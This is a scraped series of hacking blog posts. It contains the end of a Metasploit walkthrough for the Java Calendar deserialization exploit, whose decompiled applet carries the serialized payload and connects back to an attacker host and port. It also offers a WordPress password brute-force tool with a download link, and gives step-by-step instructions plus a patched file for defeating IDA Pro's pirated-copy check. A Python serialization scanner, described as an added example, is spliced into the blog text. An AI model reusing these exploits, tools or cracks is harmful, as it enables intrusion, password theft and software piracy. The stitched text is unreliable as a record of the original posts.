<div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixKyAKMHIJZDNR6cgO39PSPhRfBwXsgL0BZ7vZLEeSfrQbsXlOa7Rae0cNZ6elFNXPkP-TeeYF1iZypLkTI9EIlwd7CMSyDfsSkBvIkCRHlDtdQouj_MqwM0YQRMJ6Y0lPniikLwWb3hVT/s1600-h/msf_3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixKyAKMHIJZDNR6cgO39PSPhRfBwXsgL0BZ7vZLEeSfrQbsXlOa7Rae0cNZ6elFNXPkP-TeeYF1iZypLkTI9EIlwd7CMSyDfsSkBvIkCRHlDtdQouj_MqwM0YQRMJ6Y0lPniikLwWb3hVT/s320/msf_3.jpg" /></a> </div>
<li>Recheck the options:</li>
<div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFtH07lX5PJo97pi1oa_YH7fwMBpc5eEXeYNrB4D4RnuwcEiGDRXU98f8sa3cOcss7xzIbtqZJCYOmHMpsufWSizlz6vrIapgeSkiYNg26p5Ng9iamiMTMGg096z654yCeWq6ZbrW4Uf7R/s1600-h/msf_4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFtH07lX5PJo97pi1oa_YH7fwMBpc5eEXeYNrB4D4RnuwcEiGDRXU98f8sa3cOcss7xzIbtqZJCYOmHMpsufWSizlz6vrIapgeSkiYNg26p5Ng9iamiMTMGg096z654yCeWq6ZbrW4Uf7R/s320/msf_4.jpg" /></a> </div></div>
<li>Execute the exploit:</li>
<div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnR560FwZr1zC1JkhAv9O5ajk5lPX3pVE2tpjnSf2NCcp0WKS_sdwNm8M90OIai4gqtlmIbJYNLYjNJ9FyYSIxA5I_HdqzzRaxJDd2x5QD6ZOJLgrk2MD7RQpPIs29xTG5Gq01shP85fCW/s1600-h/msf_5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnR560FwZr1zC1JkhAv9O5ajk5lPX3pVE2tpjnSf2NCcp0WKS_sdwNm8M90OIai4gqtlmIbJYNLYjNJ9FyYSIxA5I_HdqzzRaxJDd2x5QD6ZOJLgrk2MD7RQpPIs29xTG5Gq01shP85fCW/s320/msf_5.jpg" /></a> </div></div>
<li>From the remote computer <b>192.168.0.108</b>, visit the URL <b>http://192.168.0.108/sexy_bridtney</b> and see the result:</li>
<div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUQY7shyFQy3ThKByUYgH42lX4wKuF8vJCV0T8BCFF6ewSjfW9Uqrg1AhjP58dmED-9nJHgqlsgbhI5jSnI-rriZB9UHD9Gp7uqtPY_BgLY19ktIZ2aswFj_fU4cg6FGvDSK-29BwrLVaJ/s1600-h/victim_computer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUQY7shyFQy3ThKByUYgH42lX4wKuF8vJCV0T8BCFF6ewSjfW9Uqrg1AhjP58dmED-9nJHgqlsgbhI5jSnI-rriZB9UHD9Gp7uqtPY_BgLY19ktIZ2aswFj_fU4cg6FGvDSK-29BwrLVaJ/s320/victim_computer.jpg" /></a> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCn7fVLgzm19kbROh2roisC5v9YfupdFrBJEaqyo9KICVX4R7sAVHvAZMEd-WlHt475ThMDT5dLrDpbgs8OG54tuSQg0iDQ_1I6gibDDPKxztXS3CD3YB3oo4dir5MxFY7bzqvs88-oL2r/s1600-h/msf_6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCn7fVLgzm19kbROh2roisC5v9YfupdFrBJEaqyo9KICVX4R7sAVHvAZMEd-WlHt475ThMDT5dLrDpbgs8OG54tuSQg0iDQ_1I6gibDDPKxztXS3CD3YB3oo4dir5MxFY7bzqvs88-oL2r/s320/msf_6.jpg" /></a> </div></div>
<li>0wning... :)</li>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;"></div></div><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4eM1pxLuGUguQIG_nT4h7widZ9vig-wn-sacUdDJ6SAZ7wT-t9oGQbATb4Up5Ky2vwFYa7Rf8J-bc76FrWUPGyJNY_Luwhig4QO-VIGjADOojiyuLoDEMK49ZThZw_q1jRQC95fieWILL/s1600-h/msf_7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4eM1pxLuGUguQIG_nT4h7widZ9vig-wn-sacUdDJ6SAZ7wT-t9oGQbATb4Up5Ky2vwFYa7Rf8J-bc76FrWUPGyJNY_Luwhig4QO-VIGjADOojiyuLoDEMK49ZThZw_q1jRQC95fieWILL/s320/msf_7.jpg" /></a> </div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJsJtIZ67ctzmGPfKD6Pj8libJcBbG5HneCGZVhpv4fhyphenhyphenD1zv7NAON8yFNoFXAm8Fnp_2Grbu6id4aJjs4LLlVz7Vv9z2_ps_WVVKtV6wr1srcVZEFDNaLBrHkLCFZSxYw1O59FtqkA-Fo/s1600-h/0w3ned.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJsJtIZ67ctzmGPfKD6Pj8libJcBbG5HneCGZVhpv4fhyphenhyphenD1zv7NAON8yFNoFXAm8Fnp_2Grbu6id4aJjs4LLlVz7Vv9z2_ps_WVVKtV6wr1srcVZEFDNaLBrHkLCFZSxYw1O59FtqkA-Fo/s320/0w3ned.jpg" /></a> </div> </ol><br />
A quick glance at the exploit applet. This is actually the decompiled exploit code from the Metasploit <b>Applet.jar</b>:<br />
<br />
<blockquote><span style="font-family: "Courier New",Courier,monospace;">// Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.</span><br />
<span style="font-family: "Courier New",Courier,monospace;">// Jad home page: http://www.kpdus.com/jad.html</span><br />
<span style="font-family: "Courier New",Courier,monospace;">// Decompiler options: packimports(3) </span><br />
<span style="font-family: "Courier New",Courier,monospace;">// Source File Name: AppletX.java</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">package msf.x;</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">import java.applet.Applet;</span><br />
<span style="font-family: "Courier New",Courier,monospace;">import java.io.ByteArrayInputStream;</span><br />
<span style="font-family: "Courier New",Courier,monospace;">import java.io.ObjectInputStream;</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">// Referenced classes of package msf.x:</span><br />
<span style="font-family: "Courier New",Courier,monospace;">// PayloadX, LoaderX</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">public class AppletX extends Applet</span><br />
<span style="font-family: "Courier New",Courier,monospace;">{</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> public AppletX()</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> {</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> }</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> public void init()</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> {</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> try</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> {</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> ObjectInputStream oin = new <b><span style="color: yellow;">ObjectInputStream(new ByteArrayInputStream(PayloadX.StringToBytes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span></b></span><b><span style="color: yellow;"><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Object deserializedObject = oin.readObject();</span></span></b><br />
<span style="font-family: "Courier New",Courier,monospace;"> if(deserializedObject != null && LoaderX.instance != null)</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> {</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> String data = getParameter("data");</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> String lhost = getParameter("lhost");</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> String lport = getParameter("lport");</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> if(data == null)</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> data = "";</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> LoaderX.instance.bootstrapPayload(data, lhost, lport != null ? Integer.parseInt(lport) : 4444);</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> }</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> }</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> catch(Exception exception) { }</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> }</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> private static final long serialVersionUID = 0xd30f41af207ff1c8L;</span><br />
<span style="font-family: "Courier New",Courier,monospace;"> private static final String serializedObject = <b style="color: yellow;">"ACED00057372001B6A6176612E7574696C2E477265676F7269616E43616C6 56E6461728F3DD7D6E5B0D0C10200014A0010677265676F7269616E4375746 F766572787200126A6176612E7574696C2E43616C656E646172E6EA4D1EC8D C5B8E03000B5A000C6172654669656C647353657449000E666972737444617 94F665765656B5A0009697354696D655365745A00076C656E69656E7449001 66D696E696D616C44617973496E46697273745765656B4900096E657874537 4616D7049001573657269616C56657273696F6E4F6E53747265616D4A00047 4696D655B00066669656C64737400025B495B000569735365747400025B5A4 C00047A6F6E657400144C6A6176612F7574696C2F54696D655A6F6E653B787 00100000001010100000001000000020000000100000121563AFC0E757200 025B494DBA602676EAB2A502000078700000001100000001000007D9000000 040000001500000004000000120000008A0000000200000003000000010000 0004000000100000001100000022000002DEFE488C0000000000757200025B 5A578F203914B85DE202000078700000001101010101010101010101010101 01010101737200186A6176612E7574696C2E53696D706C6554696D655A6F6E 65FA675D60D15EF5A603001249000A647374536176696E6773490006656E6 444617949000C656E644461794F665765656B490007656E644D6F646549000 8656E644D6F6E7468490007656E6454696D6549000B656E6454696D654D6F6 4654900097261774F666673657449001573657269616C56657273696F6E4F6 E53747265616D490008737461727444617949000E73746172744461794F665 765656B49000973746172744D6F646549000A73746172744D6F6E746849000 9737461727454696D6549000D737461727454696D654D6F646549000973746 17274596561725A000B7573654461796C696768745B000B6D6F6E74684C656 E6774687400025B42787200126A6176612E7574696C2E54696D655A6F6E653 1B3E9F57744ACA10200014C000249447400124C6A6176612F6C616E672F537 472696E673B787074000E416D65726963612F446177736F6E0036EE8000000 0000000000000000000000000000000000000000000FE488C0000000002000 00000000000000000000000000000000000000000000000000000007572000 25B42ACF317F8060854E002000078700000000C1F1C1F1E1F1E1F1F1E1F1E1 
F770A000000060000000000007571007E00060000000200000000000000007 87372000D6D73662E782E4C6F61646572585E8B4C67DDC409D802000078707 8FFFFF4E2F964AC000A"</b><span style="color: yellow;">;</span></span><br />
<span style="font-family: "Courier New",Courier,monospace;"> public static String data = null;</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">}</span><br />
<br />
</blockquote>The highlighted part is the serialized object, in hex, that triggers the vulnerability: the applet converts it back to bytes (<b>PayloadX.StringToBytes</b>) and hands it to <b>ObjectInputStream.readObject()</b>, which is where the exploit fires. More information can be found in the <b>Reference</b> section.<br />
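What makes this blob recognisable is the Java serialization stream format itself: it begins with the stream magic <b>AC ED 00 05</b>, then a TC_OBJECT tag (0x73) and a TC_CLASSDESC record (0x72, two-byte length, class name) for <b>java.util.GregorianCalendar</b>, and further in it names <b>msf.x.LoaderX</b>. The scanner below is an added example written for this post; it is not code from the blog, from Metasploit or from the JDK. It walks a byte string, pulls out every class name a deserializer would instantiate, and flags the ones on a denylist, which is exactly the check a look-ahead deserialization allowlist (or, on Java 9 and later, an <b>ObjectInputFilter</b>) performs before <b>readObject()</b> can reach any gadget. The sample streams are constructed to mirror only the leading bytes of the applet's blob and are not real serialized objects; <b>SUSPICIOUS_CLASSES</b> is a placeholder for a site's own denylist.

```python
"""Scanner for Java serialization streams: report which classes a
deserializer would instantiate before readObject() is ever called.
Added example, not code from the blog post, Metasploit or the JDK."""
from __future__ import annotations

import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"  # STREAM_MAGIC (0xACED) + STREAM_VERSION (5)
TC_OBJECT = 0x73                    # a new object follows
TC_CLASSDESC = 0x72                 # class descriptor: u2 length, class name, serialVersionUID, ...

# Placeholder denylist (assumption, not from the post): msf.x.LoaderX is the
# loader class named in the decompiled applet above; GregorianCalendar is the
# class whose deserialization CVE-2008-5353 abuses.
SUSPICIOUS_CLASSES = {"msf.x.LoaderX", "java.util.GregorianCalendar"}

# A class name as written in a descriptor, including array descriptors such
# as "[I" or "[Ljava/lang/String;".
_CLASS_NAME = re.compile(rb"^[\[A-Za-z_$][A-Za-z0-9_$./;]*$")


def extract_class_names(stream: bytes) -> list[str]:
    """Return the class name of every TC_CLASSDESC record, in stream order."""
    names: list[str] = []
    i = 0
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", stream[i + 1:i + 3])
            candidate = stream[i + 3:i + 3 + length]
            if 0 < length <= 256 and len(candidate) == length and _CLASS_NAME.match(candidate):
                names.append(candidate.decode("ascii"))
                i += 3 + length  # skip the name so its own bytes are not rescanned
                continue
        i += 1
    return names


def is_java_serialized(stream: bytes) -> bool:
    """True if the blob starts with the serialization stream magic."""
    return stream.startswith(STREAM_MAGIC)


def assess(stream: bytes) -> dict:
    """Verdict for one blob: is it a stream, which classes it names, which are flagged."""
    if not is_java_serialized(stream):
        return {"serialized": False, "classes": [], "flagged": []}
    classes = extract_class_names(stream)
    flagged = sorted(c for c in classes if c in SUSPICIOUS_CLASSES)
    return {"serialized": True, "classes": classes, "flagged": flagged}


def hex_to_bytes(text: str) -> bytes:
    """Decode a hex string like the applet's serializedObject, ignoring whitespace."""
    return bytes.fromhex("".join(text.split()))


def class_desc(name: str) -> bytes:
    """Build the start of a TC_CLASSDESC record: tag, u2 length, class name."""
    encoded = name.encode("ascii")
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(encoded)) + encoded


# Constructed samples (not real serialized objects). The first mirrors the
# leading bytes of the applet's blob: magic, TC_OBJECT, descriptor for
# java.util.GregorianCalendar, serialVersionUID, flags, field count, and then
# a descriptor naming the loader class. The second names only a harmless class.
SAMPLE_HEX = (
    STREAM_MAGIC
    + bytes([TC_OBJECT])
    + class_desc("java.util.GregorianCalendar")
    + bytes.fromhex("8f3dd7d6e5b0d0c1" "02" "0001")
    + bytes([TC_OBJECT])
    + class_desc("msf.x.LoaderX")
).hex()
BENIGN_HEX = (STREAM_MAGIC + bytes([TC_OBJECT]) + class_desc("java.lang.Integer")).hex()

if __name__ == "__main__":
    for label, blob in (("applet-like", SAMPLE_HEX), ("benign", BENIGN_HEX)):
        print(label, assess(hex_to_bytes(blob)))
```

Run it on the hex string from the applet (with the line-wrapping spaces left in; <b>hex_to_bytes</b> strips them) and the same two classes come out, which is why a denylist or, better, an allowlist of expected classes applied before deserialization stops this family of exploits regardless of which gadget the serialized object wraps.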
<br />
<br />
<b><span style="font-size: small;"><span style="font-size: large;">R</span>eference</span></b><br />
<br />
[1] <a href="http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html">http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html</a> -- <i>Calendar Bug</i><br />
[2] <a href="http://www.metasploit.com/modules/exploit/multi/browser/java_calendar_deserialize">http://www.metasploit.com/modules/exploit/multi/browser/java_calendar_deserialize</a> -- <i>Metasploit Module Browser - multi/browser/java_calendar_deserialize</i><br />
[3] <a href="http://isc.sans.org/diary.html?n&storyid=7879">http://isc.sans.org/diary.html?n&storyid=7879</a> -- <i>Report of Java Object Serialization exploit in use in web drive-by attacks</i><br />
<br />
x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com0tag:blogger.com,1999:blog-1022731470813881575.post-28973345889856316252009-12-18T22:30:00.018+08:002009-12-31T12:48:14.534+08:00Tool - Wordpress Bruteforcer (WP_BruteForcer.exe)<span style="font-size:130%;">Wordpress Brute Force Tool</span><br /><br />Hoho, Christmas is around the corner and here is my Christmas gift that I would like to share with others. This is a brute forcing tool that targets the Wordpress web application.<br /><br />Here is a demo of how to use the tool to break a Wordpress password:<br /><br /><br /><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjBFThq1j5ICJgrsSkSow2pLiUQW3sMfsuhFnNWtIXmLegMjOHpXDQuQHf15ZGa11JZ8D8zO-JszOlxjrdyI2nlH7MDXfr6dnNifEVjvUYeV6LwASgCXSJC9cc0qkASSifFOH7vbOXE3i-/s1600-h/wp_bruteforcer_command.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 159px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjBFThq1j5ICJgrsSkSow2pLiUQW3sMfsuhFnNWtIXmLegMjOHpXDQuQHf15ZGa11JZ8D8zO-JszOlxjrdyI2nlH7MDXfr6dnNifEVjvUYeV6LwASgCXSJC9cc0qkASSifFOH7vbOXE3i-/s400/wp_bruteforcer_command.jpg" alt="" id="BLOGGER_PHOTO_ID_5416585359465597922" border="0" /></a><br />Figure 1: WP_BruteForcer Usage<br /><br /><div style="text-align: left;"><br /><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3UN_PZFsywRQUhF94X4iuY0gEiKZ9EkpJumc4QCGjj8KulzGbiChAPzAgGRCEVK0v5BhZTjjCJJo29LJ1CkRH685V73HJZ8WOvVnTFR98m0oQa4erWbJWiUMAP-fmDrwhexBqfY1LpXr/s1600-h/wp_bruteforcer_command_target.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 355px; height: 400px;" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3UN_PZFsywRQUhF94X4iuY0gEiKZ9EkpJumc4QCGjj8KulzGbiChAPzAgGRCEVK0v5BhZTjjCJJo29LJ1CkRH685V73HJZ8WOvVnTFR98m0oQa4erWbJWiUMAP-fmDrwhexBqfY1LpXr/s400/wp_bruteforcer_command_target.jpg" alt="" id="BLOGGER_PHOTO_ID_5416589557080399026" border="0" /></a><br />Figure 2: Brute force the wordpress application<br /><br /></div></div></div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinz2aqmOcgv0zqkWLl2s2WrB8d59G0Ti5u_Yo_R8v8XOlo644NGyLdOIsISDncZFBQDfRdqph8puukKqTUDUmSANWZgi65mtr3c-1qF_Qbf_o11hLbsqdtUT-M9cQDGnhg4JIdTY_CP2ci/s1600-h/wp_bruteforcer_cracking_password.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 359px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinz2aqmOcgv0zqkWLl2s2WrB8d59G0Ti5u_Yo_R8v8XOlo644NGyLdOIsISDncZFBQDfRdqph8puukKqTUDUmSANWZgi65mtr3c-1qF_Qbf_o11hLbsqdtUT-M9cQDGnhg4JIdTY_CP2ci/s400/wp_bruteforcer_cracking_password.jpg" alt="" id="BLOGGER_PHOTO_ID_5416613021740250290" border="0" /></a><br /><div style="text-align: center;">Figure 3: Password cracking<br /><br /></div><br /><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJlDpP7J2rt1b9uYg96VhQG2XZUidKqWilMFW7_Kcs4lUTB3S4587GSG6W9YQjMqQwcEuiDf5h9ZLUWRcYofbASKJpeSje-ezoJRqfLpehTjuciE9Z6T6DXK96F-rVUVg2X9rGHLd_JVYQ/s1600-h/target_website.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 274px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJlDpP7J2rt1b9uYg96VhQG2XZUidKqWilMFW7_Kcs4lUTB3S4587GSG6W9YQjMqQwcEuiDf5h9ZLUWRcYofbASKJpeSje-ezoJRqfLpehTjuciE9Z6T6DXK96F-rVUVg2X9rGHLd_JVYQ/s400/target_website.jpg" alt="" id="BLOGGER_PHOTO_ID_5416598703592436562" 
border="0" /></a><br />Figure 4: Target Website (Dummy one ;))<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPOmePxo7wszPFeC349O5h-cnXjTCbU1nmLbI2xKSKDekJJ6SrkffC0GSJge5Rtj3O364yF9go_HWpNbwAf862EuFOp3lViw_Vl8Q9vhVIDXB2JvUhxsy0_01-WZ-MnKWAuXoXBe5jGCcp/s1600-h/target_website_02.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 274px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPOmePxo7wszPFeC349O5h-cnXjTCbU1nmLbI2xKSKDekJJ6SrkffC0GSJge5Rtj3O364yF9go_HWpNbwAf862EuFOp3lViw_Vl8Q9vhVIDXB2JvUhxsy0_01-WZ-MnKWAuXoXBe5jGCcp/s400/target_website_02.jpg" alt="" id="BLOGGER_PHOTO_ID_5416600544164911458" border="0" /></a><br />Figure 5: Ready to crack the website<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLXFx0DJ-caK7Lk3whIAW7skxTrTlgRPjkDUrrcw96dK2n_3oIdjNDRI3yLt25wEyIBq-RCvIw6a4EkKlkqNKqbA3PGSbTI8D4QdeCU7Rp6SmPmSt-fWxi1VZEaFYls5kHrEM_FiZwZQQk/s1600-h/Owned!!.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 274px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLXFx0DJ-caK7Lk3whIAW7skxTrTlgRPjkDUrrcw96dK2n_3oIdjNDRI3yLt25wEyIBq-RCvIw6a4EkKlkqNKqbA3PGSbTI8D4QdeCU7Rp6SmPmSt-fWxi1VZEaFYls5kHrEM_FiZwZQQk/s400/Owned!!.jpg" alt="" id="BLOGGER_PHOTO_ID_5416601247239268210" border="0" /></a>Figure 6: Owned!!!<br /><br /></div><span style="color: rgb(255, 0, 0);">Note:</span><br /><br />It would be a good idea to run the tool in Windows platform although wine environment can be used also but the tool is not stable for some reason (I didn't investigate further in this case ;))<br /><br /><span style="font-size:130%;">Download Link<br /></span><br /><a 
href="http://www.4shared.com/file/175981151/3f124165/WP_BruteForcer_final.html">http://www.4shared.com/file/175981151/3f124165/WP_BruteForcer_final.html</a><br /><br />~Signing off<br />@x9090<br /><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"><br /></script>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com12tag:blogger.com,1999:blog-1022731470813881575.post-75855590972336859282009-09-24T19:44:00.012+08:002010-01-11T21:50:20.161+08:00"Sorry, this database has been created by a pirate version of IDA Pro"<span style="font-weight: bold;"><span style="font-size:130%;"><br />
Patching ida.wll</span></span><br />
<br />
<span style="font-weight: bold;">Target: IDA Pro Version 5.2.0.911 & Version 5.5<br />
<br />
</span>Some of you might have encountered this error message when trying to open an idb (IDA database) file. It only appears if the idb was created by a pirated copy of IDA Pro, as in the screenshot below:<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh7n5N_tOTyXmPXIL-o7Y9fs4xDoYy0QFck0OdGhpCrsXuIpyCGR0ZNfo9As7OmdAe_HERabpFv4YRWfWWfgNqRYMHDTT9ZD167oiQF-sZNmo9DSFdw5gmefgUai1s2QkwBRVZVe56Mnp8/s1600-h/error_ida.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 280px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh7n5N_tOTyXmPXIL-o7Y9fs4xDoYy0QFck0OdGhpCrsXuIpyCGR0ZNfo9As7OmdAe_HERabpFv4YRWfWWfgNqRYMHDTT9ZD167oiQF-sZNmo9DSFdw5gmefgUai1s2QkwBRVZVe56Mnp8/s400/error_ida.JPG" alt="" id="BLOGGER_PHOTO_ID_5385000611792267570" border="0" /></a><br />
Someone on exetools.com has posted the patch, but only for registered members. Based on the description there, it is actually not hard to patch out the pirated-copy message.<br />
<br />
The steps are fairly easy:<br />
<br />
<ol><li>Find <span style="font-weight: bold;">ida.wll </span>from your IDA installation directory and load it with IDA</li>
<li>Find text string "<span style="font-weight: bold;">Sorry, this database has been created by a pirate version of IDA Pro</span>" by using <span style="font-weight: bold;">Shift+F12 (Strings tab)</span></li>
<li>Press Enter to jump to the data section</li>
<li>You should see the name <span style="font-weight: bold;">aSorryThisDatab</span>, which IDA has already defined for the above string</li>
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFaizSi0kDTwKIamBQUllparmxdG7p8wS4ohOF4yEttA9nimlMpsC-d1QbwLkFdOz_2r8swHyYCCCbVU4oA0rUZwoRh_u_BYu4-_5uLOKHSpfcqjqi2oM4rqq9rxUDE506lpqYBdETLBws/s1600-h/aSorryThisDatab.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 279px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFaizSi0kDTwKIamBQUllparmxdG7p8wS4ohOF4yEttA9nimlMpsC-d1QbwLkFdOz_2r8swHyYCCCbVU4oA0rUZwoRh_u_BYu4-_5uLOKHSpfcqjqi2oM4rqq9rxUDE506lpqYBdETLBws/s400/aSorryThisDatab.JPG" alt="" id="BLOGGER_PHOTO_ID_5385003497110578370" border="0" /></a>
<li>Put your cursor on that name and press <span style="font-weight: bold;">x (cross references)</span> to jump to the code that uses this data</li>
<li>You should now jump to the code which looks like this:<br />
<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtUJhHUC0NsKwZlb_GpaUXgpC_KdqRArOFYShihw-CZp7h1WCu4FKhfPjniI3LlzavpsEfGuZR7LBuk5MxKlXsluEck-oMari-kbEJKxbbHF-ZV6D-ZmZsbNk1EDPM5SMwXCIV227bfgUy/s1600-h/code_patch1.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 279px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtUJhHUC0NsKwZlb_GpaUXgpC_KdqRArOFYShihw-CZp7h1WCu4FKhfPjniI3LlzavpsEfGuZR7LBuk5MxKlXsluEck-oMari-kbEJKxbbHF-ZV6D-ZmZsbNk1EDPM5SMwXCIV227bfgUy/s400/code_patch1.JPG" alt="" id="BLOGGER_PHOTO_ID_5385005019488227730" border="0" /></a><br />
</li>
<li>Notice the <span style="font-weight: bold;">jz </span>before the "<span style="font-weight: bold;">call sub_10039660</span>", double click to enter <span style="font-weight: bold;">sub_10039660 </span>function</li>
<li>You can see the 3 exported functions <span style="font-weight: bold;">MD5Init, MD5Update </span>and <span style="font-weight: bold;">MD5Final</span>.</li>
<li>Go to the part where it nears the <span style="font-weight: bold;">retn</span> instruction.</li>
<li>Take note of how <span style="font-weight: bold;">EAX </span>is updated, because this register determines whether the hash matched; after returning to the previous function it is checked with "<span style="font-weight: bold;">test al, al</span>"</li>
<li>From the figure above, we know that we can avoid the pirated-copy message if <span style="font-weight: bold;">EAX is zero</span>. So we can patch "<span style="font-weight: bold;">mov al,1</span>" to something that gives us <span style="font-weight: bold;">EAX=0</span>, e.g. "<span style="font-weight: bold;">xor eax, eax</span>" ;)</li>
<li>Using any hex editor you prefer, jump to this address and make the modification. Done!!!</li>
</ol><br />
<span style="font-weight: bold;">Download: </span><a href="http://www.4shared.com/file/135059142/216192f2/idawll.html">ida.wll.patched</a><span style="font-weight: bold;"><br />
</span><span><br />
<span style="font-weight: bold;"><span style="font-weight: bold;"></span></span></span><span style="font-weight: bold;"><br />
<span style="font-size:130%;">Reference</span><br />
<br />
</span><span style="font-style: italic;">Datarescue IDA pirated .idb database</span> -- <a href="http://forum.exetools.com/showthread.php?t=12087">http://forum.exetools.com/showthread.php?t=12087</a><span style="font-weight: bold;"><br />
</span><br />
~Signing off<br />
@x9090<br />
